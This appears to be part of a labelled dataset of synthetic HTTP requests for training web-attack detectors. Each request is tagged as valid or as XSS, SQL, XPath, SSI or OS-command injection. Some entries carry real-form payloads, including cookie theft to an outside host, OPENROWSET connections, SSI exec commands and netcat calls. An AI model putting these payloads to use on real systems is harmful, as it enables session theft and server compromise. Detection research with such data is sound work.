If-Range: "1NjvsLmiCC7S1ZgH"
Max-Forwards: 851
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: NTLM ZTFlZ3Jhb3l5cG9pR25JdDlhU3VlZHROaXJobHI5cnVoZmFlaEVnb256dW5u
Range: 9514-74568
Referer: /jyw8umO.js
TE: gzip,chunked
Trailer: User-Agent
User-Agent: aDC-4K http://www.rlhal.net
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1267x0247
Via: rleakl/3.8 www.Oereeo.js, liaoF/0.0 www.easioela.tiff
Transfer-Encoding: identity
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 13809536911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27171
Start - Id: 47510
class: XSS
GET /tclye/eyjf7fID3IKC/2WAdrcpidv/ayieAag6LaEtaS/MJD/tbiRapopdHlCeO@8dc/9ezeuuiR/ysAT/hKa/EUlznrr/7e0.msf?8snusssGdSexs=rl%3Behnph-Dhxnh0ai&goo75w2nYlo5=ryaa7&etmirega7OiC=o1%5CiSytseet2%26fT&gkt=usu&TSZb8J7=9&emoco45lstmrnn=%3Ca++href++%3D++%22about%3A%3Cs%26%2399%3Bript++++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.erlili.com%2Fcgi-bin%2Fnganra.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E++%22+++%3E&KbetweenZJ4N=aiydi HTTP/1.0
Host: 38.201.136.10:804
Connection: keep-alive
Accept: audio/basic, video/*;q=0.6, audio/basic;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: rnnaievy-ursd;q=0.8, pl1jtr-aybt, N-ds0oi, li7s-neipoer
Cache-Control: rc='hoq'
Client-ip: 83.78.121.7
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="817"
Date: Thu, 07 Jun 07 24:30:56 GMT
ETag: W/"T.nifG87SHPiwpM4.IO4"
Expect: tnareq2o=fue64Ubi
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 13 Apr 06 15:53:13 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:44:56 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Jun 07 10:29:37 UTC
Max-Forwards: 0
MIME-Version: 9.4
Pragma: lRetr='hhobli'
Proxy-Authorization: Digest nonce
Authorization: NTLM b29ycWxlc3M2U0lnNUk2SXdOcmNpYWVOdGZ0YWFlbW9mYWtpd2VlYWlybzdmZGc=
Range: -582231
Referer: http://www.lerKetNo.be/iaLlsr/a9iwn/jtiej.pdf
TE: gzip;q=0.1
Trailer: Authorization
User-Agent: Mozilla/8.4 (compatible; MSIE 4.0; Mac OS X; mnrt; mdrna3eh; mnsjt)
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: fiers/8.6 www.icdes.tiff, wyr/2.4 29.214.95.96, FTP/5.5 www.1ese.html:51513
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 128.172.113.199
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47510
Start - Id: 49913
class: XPathInjection
GET /7J7bD086kWtdUME@ZFo-/oiyc4teeeO6/el56teu9lontwimeoao/arNeteueeousy/e9feoilcmti7I/gAxeM_FjdtGx/aTNSktdhKjw-rz.js?wsciirethfH4=e1rfa%27%5D+++%7C++++P++++%7C+%2F%2Fuser%5B++name%2Ftext%28++%29+%3D%27in&toaemzie=a3siC3FQs&ias9ydns09efd1t=71755&alnxma2otav2yed=position&nna=7749512439&ne3pu=%3C&titam5n0si=gjetqdnn&rsy2OtAcfc=i&QMyt=sik HTTP/1.1
Host: 101.161.175.34
Connection: altt32
Accept: application/postscript;q=0.7, application/zip
Accept-Charset: windows-1252;q=0.2, us-ascii, hz-gb-2312, gb2312;q=0.5
Accept-Encoding: *
Accept-Language: euo8hh-yt;q=0.9, 4Iaitoei-ite4e, uthykelt-kot, 0toevE8-rgteRahx;q=0.8, iNnr2-ttr;q=0.4
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: lttldLnFtf=h ybselect\~umr?aenddie;wn=97259;qunIcs619eoecer=gtuac>nncSm
Cookie2: $Version="34"
Date: Wed, 23 Feb 05 22:50:03 CET
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
If-Modified-Since: Thu, 30 Jun 05 02:24:07 UTC
If-Unmodified-Since: Fri, 15 Jul 05 04:22:57 UTC
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: Digest algorithm=MD5-sess
Range: -983
Referer: /xprRoOl/etrks/owriez/as6igdb.shtml
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 8.6; aN-tc; rv:6.3.1) Gecko/23467301
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 4.2 www.hcgi.png, 0.3 113.129.178.56
Transfer-Encoding: deflate
Upgrade: ldT/6.4
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49913
Start - Id: 34593
class: Valid
POST /hQj/tlunnnNutletheismi/-CevalNaHP-VI4Jform/enctnSpbeltadz3iah0/EnejHfL/juIpz9/gbC@ZW@/yjo/2RQFlinkCja66hjX/dgyoaorsrkasetnr4tee/tVJQoXY.gif? HTTP/1.1
Content-Length: 104
Content-Language: g,p
Content-Encoding: identity
Content-Location: http://www.wbd2u.cz/aIMenai.php3
Content-MD5: d2x3YW9lZWVvZXluaHVsdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Aug 07 01:17:47 GMT
Last-Modified: Wed, 25 Mar 09 11:39:07 UTC
Host: www.eeu32tsh.biz:83
Connection: r1nnpyi
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 183.77.63.173
Cookie: tiaidppnai=00630
Cookie2: $Version="5"
Date: Sat, 24 Nov 07 02:28:20 UTC
ETag: W/"ZmDVx@SFqK2OVVsPXB.2"
Expect: 100-continue
From: hAcasd@ertucieec.de
If-Modified-Since: Sat, 20 Aug 05 05:33:18 UTC
If-Unmodified-Since: Fri, 07 Oct 05 19:35:03 UTC
If-Match: "jYyG0Vw3ecOPnygZ_Fqu"
If-None-Match: *
If-Range: Fri, 31 Oct 08 02:30:22 GMT
Max-Forwards: 63
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: zrmksr d9tnue=cunsrA5
Range: 1867-,-2727
Referer: http://www.ezo6kna.it/c59eess/Hi6o.sh
TE: trailers,gzip;q=0.2
Trailer: Date
User-Agent: Mozilla/9.8 (compatible; MSIE 5.5; Windows NT; hhIex; ntyatn; naaroer)
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: 5holu/6.9 77.165.28.161, 6.4 179.245.225.131
Transfer-Encoding: ler2s
Upgrade: aiiee/8.2, tosd/8.9
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1eKZbHR=oyaccepta'ou?wp-dw iltxdzh&scriptFBkXfboot.iniZ=dR7aer&eznotxnoea5r=wtpae2u&loaInutioe=af3o2

End - Id: 34593
Start - Id: 42142
class: SqlInjection
GET /ovrnoiqnu6b/ciu4ozlvitre23/0cNlrxJynYhlmL/n1zC7mrO3.php3?shreisy=864767&O7ri=Tm2&eetef5iferw=Lrswoh-3httpst&ecoac=%3E%5B-a%5BL&sontiiid=64&ofgsml0krh2zos=815019&mijeisnO=%3B+++++select+*+++++from++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3DPw8s%3Bpwd%3Deni%3BNetwork%3DDBMSSOCN%3BAddress%3D37.142.40.199%2C62549%3B%27%2C%27select++*+++from+++++pv1m0t%27+%29&fsbtius=iv9ii&9omshqtl9=+ HTTP/1.1
Host: www.oi2oo.cz
Connection: notdy
Accept: */*;q=0.5
Accept-Charset: euc-cn, iso-2022-jp, iso-2022-kr;q=0.8, iso-8859-7;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 117.221.83.105
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="5"
Date: Wed, 27 Jun 07 18:03:44 GMT
ETag: "Y-kpqEtfEwcQg2fs"
Expect: lvwu=Oe0m;eyxsous=diee
From: yaieolw@dAieet.st
If-Modified-Since: Tue, 25 Jul 06 08:09:22 UTC
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "gXtmJ1o3QKiR1Y7fdl"
If-None-Match: "uj5412N6l4Svhfsos"
If-Range: Mon, 30 Mar 09 03:11:01 UTC
Max-Forwards: 1
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: /ohu5ahr/pajdn8/8eolev/aRtwse.php3
TE: trailers
Trailer: Connection
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 2.5; oo-et; rv:7.5.6) Gecko/40178737
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: 5.9 www.rantT.css
Transfer-Encoding: deflate
Upgrade: imEa/4.5
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42142
Start - Id: 7226
class: Valid
PUT /Bq/r7aK1NbZJbXvF7include/rcyesBdsEOluuto7ss/atsa94l/deemegtosehwmn/documentkV0OV/dn6afKwhn4Bas/enNa0ptmzp/IXef2.jpg? HTTP/1.1
Content-Length: 221
Content-Language: hoMxaum5
Content-Encoding: compress
Content-Location: /eodv/iIaEp/dd0uE8/tcrTsokr.asp
Content-MD5: dGhtUHdzb3J0bmVlbkV0dw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jul 07 24:40:17 GMT
Last-Modified: Sat, 11 Oct 08 17:48:01 CET
Host: 29.28.91.247:4682
Connection: close
Accept: audio/*, text/*
Accept-Charset: big5;q=0.9, koi8-r, koi8;q=0.9, x-mac-ce, iso-8859-4;q=0.7
Accept-Encoding: identity, identity;q=0.3, identity;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 83.132.90.202
Cookie: Erd=uh-g;odeovG=e8+bgsound;4HobetweenVxB=|beihmsofroma;vsamsceaeosU=srat6psewlen=@a%
Cookie2: $Version="340"
Date: Thu, 18 Sep 08 01:30:15 CET
ETag: W/"CXAljVW.aYONgno@TIm"
Expect: rri96osu
From: seKsui5@tneeaatdac.fr
If-Modified-Since: Sun, 31 Oct 04 10:59:24 UTC
If-Unmodified-Since: Mon, 15 Mar 04 17:24:02 UTC
If-Match: *
If-None-Match: "XfVq3qNuQ9TJ7lqIs"
If-Range: *
Max-Forwards: 1866
MIME-Version: 6.6
Pragma: S=olequu
Proxy-Authorization: NTLM aHN3NHJ6aXRlc3RlaW9zdGliaHZlbnVvY29vb2VuOWFrQTVzbnhjbnNobnYw
Authorization: nlt3Oh 8issjt=tyseo
Range: 7717-
Referer: http://atagq.org/heerwr6.swf
TE: trailers,trailers,chunked;q=0.3
Trailer: Range
User-Agent: Mozilla/1.9 (X11; U; Linux i386 0.7; la-s9; rv:0.0.5) Gecko/46424603
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 629x010
Via: HTTP/6.7 74.155.138.253:415, 4.5 140.140.169.177
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 676 www.hooAenjp.htm:218 "aqnEtosob2" 
X-Forwarded-For: 94.164.69.87
X-Serial-Number: 35067124458
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

enrius4cmay3ha=ntepet&hEceeimce=I&fO=O xmlcslisaygtv&rR_@Dwinntz1D=abMe&ebbrrfcbigta6=tsea2eEh&miPesdaoeuNU=ie;hf&vxp_D0A-2P2FV=0Bepassthruw&tibasa6toni66=117&nrhk=mailnrt;'i&aetea58rn=ane&9IC826RcconnectNm_=uneelxn

End - Id: 7226
Start - Id: 48563
class: XPathInjection
POST /R9/xk1Dl3Z09IQ/cdiatoalicTr7w4uao/QoM1E5nullGv/ycooLe6so8ttne/U48between095QwNMv/ebhffd4PrDX/AWJexecu.png? HTTP/1.0
Content-Length: 296
Content-Language: aetdn
Content-Encoding: compress
Content-Location: /egceets/0ie24nhs/odaThi.doc
Content-MD5: N0FlaG9mb2V1QWVvcmFlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 18:11:54 UTC
Last-Modified: Wed, 17 Feb 10 22:50:34 UTC
Host: www.aau9ag.uk
Connection: auaIbs
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: thno-iafd9;q=0.4, ot3oaeu-ae, eHab6lik-4n;q=0.2, bnsdhjts-Ihdh;q=0.7, k0c-cetucr
Cache-Control: only-if-cached
Client-ip: 174.93.187.45
Cookie: uipp=368043
Cookie2: $Version="8"
Date: Wed, 20 Dec 06 06:34:50 UTC
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: olaslnwd=eMwneuh;iodg7=mroae
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 15 Mar 05 07:31:51 UTC
If-Unmodified-Since: Tue, 02 Aug 05 17:59:54 GMT
If-Match: "Z6c43SIzfP2qH58GinIm"
If-None-Match: *
If-Range: *
Max-Forwards: 83
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: siue bdclebse=ssaui
Authorization: Digest opaque="snbwF"
Range: -99
Referer: /a5ethl/egsDss/esko1m4/mtHa.exe
TE: chunked;q=0.7
Trailer: Authorization
User-Agent: Mozilla/8.6 (X11; U; Solaris 5.0; s5-sE; rv:7.1.1) Gecko/43236244
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: 8.9 145.176.215.116
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

rtoo8a5barr=lin$Gme]r;H&Lceb35peu5e=rSkeyos'  or   (i   <     count(lepen/child::text()) and    j    <   count(ueta/child::comment())  and k    < count(tlqbe/child::*)    )   or    'ln'   =    '    i5e2ex'     or&mLw33A0anuUKr=gmN

End - Id: 48563
Start - Id: 32894
class: Valid
POST /sE/rn1sq/pDXAuscriptKUm6/ajBExF8YKC9M2hld/k5ol6Hu/ewraOEv7.Cly1PDNrWfH/gzdnyrtm6xn6po8.html? HTTP/1.1
Content-Length: 59
Content-Language: aNfycrm,oriswXfn
Content-Encoding: compress
Content-Location: http://uOeevn.fr/RtosR/ena5s1An/noseenr/e47wb/2geer.msf
Content-MD5: ZXBvY29laGZ1YTJ0aWx0Mg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Dec 05 03:05:42 CET
Last-Modified: Thu, 21 Aug 08 18:49:30 UTC
Host: 83.7.107.185
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate, compress, compress;q=0.5
Accept-Language: 1ezteiog-lTk9x;q=0.7
Cache-Control: no-cache
Client-ip: 223.203.207.16
Cookie: utrM0emh=:netcat-[9trbym-;tzi4ritAri=274
Cookie2: $Version="99"
Date: Wed, 16 Jul 08 17:17:56 UTC
ETag: "1UmVFxzuxmLpl7L.dksv"
Expect: pnte
From: Aecihs@arog1.org
If-Modified-Since: Wed, 16 Apr 08 04:23:47 UTC
If-Unmodified-Since: Sun, 01 Jun 08 20:24:26 UTC
If-Match: "SlsufgbhXn4SscJBtC6b"
If-None-Match: *
If-Range: Wed, 15 Jun 05 11:47:20 GMT
Max-Forwards: 1766
MIME-Version: 4.5
Pragma: gm='nhr'
Proxy-Authorization: Basic TklvdmI6bzFkYWE=
Authorization: jaEnub e6to9=ehEfmtso
Range: -11
Referer: /cdcm/3oa7d/ssg8qm/tNse/d9pepted.rar
TE: trailers,gzip,gzip;q=0.7
Trailer: If-Match
User-Agent: 4egAon (nTZqqO@; rHzI_kEZ; zUU0PCC_Sk)
UA-CPU: MIPS
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: FTP/8.3 4.32.19.4, 8.8 20.165.37.110, 1.0 0.136.30.122
Transfer-Encoding: gzip
Upgrade: nttueo/5.8, iHertn/7.7, edu/1.0
Warning: 033 141.231.242.145 "t2po3soltutrrfuxesh" "Fri, 15 May 09 15:44:54 CET"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 45551258621
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NecWt4il=\a:scriptinvarru eIesamihaving/&access_log

End - Id: 32894
Start - Id: 40963
class: SSI
PUT /tto5n9ao8lhmtotrtww/hWa3F.@NBI3cati/hnooyftnemeoi/sorricsdnN3fdtiFwEE/VUA6vXe.fincludevB/eemTw.html? HTTP/1.1
Content-Length: 14
Content-Language: ednEdS,iu,nIgotet
Content-Encoding: gzip
Content-Location: http://www.niiep.it/c3aoeil/eSj9l/sotr7/noyip6h/te8njafu.bin
Content-MD5: YWFnZm91dGhwb2xTZXNnZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Aug 08 08:33:52 CET
Host: 178.94.2.217
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.6, euc-jp, iso-2022-kr, isiri-3342;q=0.8, utf-7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Cookie: ens3tme5=<!-- #odbc statement  ="select    sltoat,  qsu,     w0cd  from  1ceueb     order  by    3,  39,    8"   -->
Cookie2: $Version="56"
Date: Sat, 08 Jan 05 11:07:31 UTC
ETag: W/"67ryCATZCNh6dJkr9n"
If-Modified-Since: Mon, 09 Feb 09 21:05:15 UTC
If-Unmodified-Since: Fri, 03 Feb 06 07:12:04 UTC
If-Match: "meriU_IvHUEkDfy"
If-Range: *
Max-Forwards: 803
MIME-Version: 4.2
Pragma: ee7osph=d
Authorization: Digest opaque="thys"
Range: -1
Referer: /afpReae/nrnna6te/nbygoqp/rhcgeltn/onxjht.mspx
Trailer: Expect
User-Agent: itd4s (eW8LfWIiit; iHM9lT; hwhb6bvu5)
UA-Color: color16
Transfer-Encoding: deflate

R1riIxqhG6lw=e

End - Id: 40963
Start - Id: 5511
class: Valid
POST /Ninuhi7tS5Tr1bbk/3DqL/seye/eJUFi2UFgP9Eia/nyIze/sghTxmdkGjggRFHlERHM/rideooid3Mie/eeaceteerndit1rrgkhy/xCDlZp/efXaj/lHSAiHoiUy1mc/dwelwao9.shtml? HTTP/1.0
Content-Length: 245
Content-Language: ort8
Content-Encoding: identity
Content-Location: http://edediia.biz/Uutch/hersLlul/jewewama.html
Content-MD5: dW5tN0lwZGV0ZHN2cmV0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Jun 04 16:59:10 GMT
Last-Modified: Sun, 20 Aug 06 11:28:08 GMT
Host: 212.9.47.180
Connection: iQIt3
Accept: audio/*;q=0.0, video/*;q=0.3, image/*
Accept-Charset: x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 215.145.118.43
Cookie: j4aujCftahkesu=rp96;5mwenr9ektuedl=aeioahhlMzeEtylLnc;ennendsss8n=58737054
Cookie2: $Version="30"
Date: Thu, 05 Oct 06 10:36:12 UTC
ETag: W/"ClRNYgOpJa7vxzd"
Expect: 100-continue
From: RlTg@lDaee.org
If-Modified-Since: Wed, 15 Oct 08 12:26:32 CET
If-Unmodified-Since: Sun, 15 Jun 08 05:33:05 CET
If-Match: "2EQ0WCyjZ@4aCj@P7"
If-None-Match: "A1l.GE1y3g7oBNNNfc"
If-Range: *
Max-Forwards: 511
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Basic RXR3d2dpd3c6dzZnZXB4ag==
Authorization: td2os rysi0=u5itgadb
Range: 4-,7992-3492,625-
Referer: http://www.o90he.org/oszqyw/dssRni/theh.pl
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: e1at/3.2
UA-CPU: 68000
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4443x6588
Via: HTTP/7.5 www.5ttqe.shtml
Transfer-Encoding: a4rne
Upgrade: ttd44a/8.9, eme6te/3.4, sge/5.8, 8mn/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe828=lev&tt17M5Metafe=hP--KRz-&dzuce=3798624&nrdybt7e7=positionure@&GNsJEboot.ini5=e\&htgrerApzwea=sww&Mbnsetii=reyyi4V&oe7snWt=lvDism&hrdotp=11332&rdn8e2Lf=8Wnnj&d6oon5ra7hmmcs=si6utfhr&rtsn4rTrrzni=ahl~&ineehrie=sl@bztGHh&SKr2=tcieOee

End - Id: 5511
Start - Id: 40258
class: SSI
POST /tm-J5gXcL10j1T@zwa0/e6BTuVWwNKfT/edmtnc/sN22INZJd/r4rntec5nwleuAdI/scriptqq/n2UrMJAG/R0a6f96kS@6OVjMH/_p_Zainclude5NtOXG/0IJoMLW-Mq/xDwC0vFTK2tVJCV.jpeg? HTTP/1.1
Content-Length: 316
Content-Language: c,oeoq,ahCire
Content-Encoding: gzip
Content-MD5: c2VXaGdyc2VudGEwbk9uZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Oct 08 15:39:44 UTC
Host: www.2cfqbiitcs.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.5, macintosh
Accept-Encoding: gzip, compress;q=0.1, compress;q=0.4, identity;q=0.6
Accept-Language: *
Cache-Control: max-age=005
Client-ip: 128.95.216.150
Date: Sun, 13 May 07 01:30:04 CET
If-Match: "WoLBzGtFYuP.kvFU5bZA"
If-None-Match: "M3Jv7mLZkvsSHDYaRMQj"
Max-Forwards: 993
Proxy-Authorization: NTLM bmlldHRBYmU1WWVjN29jbWpyYWFOc2FpYWFuZU9wak9vMnM5YWFnOUc=
Referer: http://seVy0ies.com/ewtkwnjh/oaes6kn.asp
TE: trailers,trailers,deflate;q=0.0
User-Agent: lfAo4dca
UA-Color: color8
Via: reus/2.6 www.eank4of1.css, 7.8 www.to2t.jpg:4147, FTP/7.2 18.231.78.66
Transfer-Encoding: compress
Warning: 841 www.obTrs.gif "asfwueaaea" 
----: -------------------------------------

scaNkcrsth6d=aNaIl6duNpw&ipMRK=aLFYi&endas=te&1XBnbAAsamIhtpassIz=<!--    #exec     cmd="c:\progra~1\neOneBs3\i2\lfhleco.exe  d:\rel4HNaomD\www.oronve.org\ad\database.mdb  /x  exporttofoxpro"-->&reha8go=ho1shuiLQEH&IHlxCxCfz69M=1552&tzTn4lrf=3770818782&whomekARkZ='~csoce:

End - Id: 40258
Start - Id: 48487
class: XPathInjection
GET /n-f-OKtCfC1HjqJfL/aZous7enxsdr3rhum/minroo/teyAeiTeohirkede4dt.tiff?rtneiSeekwDaae=eftphisun&eIKte=96563&eeqmeweths=09&iWpRiawdyphl3=0898&oaittrawre=vbscriptaunionp&aeodoaaa3fbl=rsgedjOr+locationiubo%29%5Dl&eahS7dth64tna0=+m%3ElwlnsgsiopyT HTTP/1.1
Host: www.neolcie.de:32
Connection: nTtoi
Accept: video/*;q=0.7, text/*;q=0.4, video/*
Accept-Charset: euc-tw, x-mac-japanese, x-mac-turkish;q=0.6, windows-1252;q=0.6, ks_c_5601-1987
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 209.69.144.246
Cookie: nrxyhbieeapsi=ba'  or     6    <   count(path/child::*)     or    'OlyEnNe' = '
Cookie2: $Version="258"
Date: Sun, 17 Aug 08 06:00:58 GMT
ETag: "JwzizFhIys8dTQTKaRo"
If-Modified-Since: Sun, 21 Jun 09 07:32:10 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Dec 07 24:16:47 CET
Max-Forwards: 419
Pragma: fa=o
Range: 0-977,-38694
Referer: http://www.ta0ojfs8.cz/alt4N/sbrnt/iqnr.sh
TE: deflate,gzip;q=0.6,trailers
Trailer: Host
User-Agent: hRxOdra0o http://www.anhh2o0i.fr
UA-Color: color16
Transfer-Encoding: identity
Upgrade: azokf/9.7
X-Serial-Number: 5936575
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48487
Start - Id: 43463
class: OsCommanding
GET /dnR.enpB/v7H/piJG567DQpGTJK@vx/Saree9Sayo/monrt0kfs1thrs.gif?rkg=02619&yhwuwhs12asie98=uDd&eaai90neab=632279&prrnra847=nIi&QhnN=uc2CEk&3puktotns=5314&bh6tahpae6t=27&q7access_logQdocumentg8d@GO9=836477&ei6e=%250a++++nc+www.lela.com+++++80+++++%3B&lteaote=63&gIeN=yeheenpbnynae10oe&li6rGcrkth5scta=136187092&tirwchfITehu=a6miee+o&Ohrde80=hR1t9passthruipynrAdocumentdeleteew%3Ccr&ergigwpsp=2027687733 HTTP/1.1
Host: www.el9szWn.org:80
Connection: hNdaRE
Accept: application/*;q=0.5, audio/*, application/*;q=0.1
Accept-Charset: x-mac-ce;q=0.7, iso-8859-7;q=0.1, x-mac-japanese;q=0.4, windows-1250;q=0.2, koi8
Accept-Encoding: 
Accept-Language: s-o;q=0.8, idrnani-Nbpe2r, oike-tmi;q=0.2, fl-dqe05Amp, whsoia-n
Cache-Control: bsunttp=goa
Client-ip: 2.162.211.68
Cookie: qic8onrtn9ntav=rFj3a
Cookie2: $Version="5"
Date: Thu, 20 Jan 05 13:52:39 UTC
ETag: "ovvj4GghfZC8siq34Gtg"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
If-Modified-Since: Fri, 15 May 09 13:44:44 UTC
If-Unmodified-Since: Sat, 02 Dec 06 17:23:50 GMT
If-Match: *
If-None-Match: "GLdG6pLzdOZyWbSZd@nK"
If-Range: Sat, 25 Mar 06 11:34:09 GMT
Max-Forwards: 37
MIME-Version: 6.8
Pragma: no-cache
Authorization: tUmcn a4hk=n4Iui
Referer: http://I8fLmht.uk/e9ai/rho35a/c3ha.jpg
TE: gzip;q=0.2
User-Agent: iKvAGGUog. http://www.rHke6.ch
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: oix4/9.4, hl1rd/5.1, jsHtts/4.7
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43463
Start - Id: 26307
class: Valid
GET /isIla2secg277.jpg?q.K7jertyUWF=rh&rWgp3N1HmH=aBNDIZmbW&-OAsrWU=murrfn7etr&editc=o HTTP/1.1
Host: www.fm8wa.st:80
Connection: keep-alive
Accept: text/*;q=0.3, text/html
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: n1odhgRj-9;q=0.7, Oleea-sntat;q=0.0, nai-fkf;q=0.9
Cache-Control: only-if-cached
Client-ip: 55.156.173.255
Cookie: gtEHwi5loaS=dbh;tit=602;EeR5hb5=929131
Cookie2: $Version="90"
Date: Mon, 02 May 05 21:13:41 GMT
ETag: "wP.pVv6NkD6cB36Mm"
Expect: 100-continue
From: teed6sis@nesteei.biz
If-Modified-Since: Sun, 08 Mar 09 23:05:23 CET
If-Unmodified-Since: Fri, 18 Feb 05 19:58:54 GMT
If-Match: *
If-None-Match: "VQ0o906Otg3xPYnvlzTf"
If-Range: *
Max-Forwards: 6693
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Adal quAd4eh=bitares
Authorization: NTLM c2luc3d0aWlhdGVzMncwdGM2dHJwbHBPeWxzZXByZW5haW5hdG9u
Range: 338-840605
Referer: http://o4s1t8le.st/sxeY7Ndx/nsoesn/f9aaaun/mHwsdu/imiviscS.png
TE: trailers
Trailer: Upgrade
User-Agent: w0imfffr1ewoouaptsA
UA-CPU: StrongARM
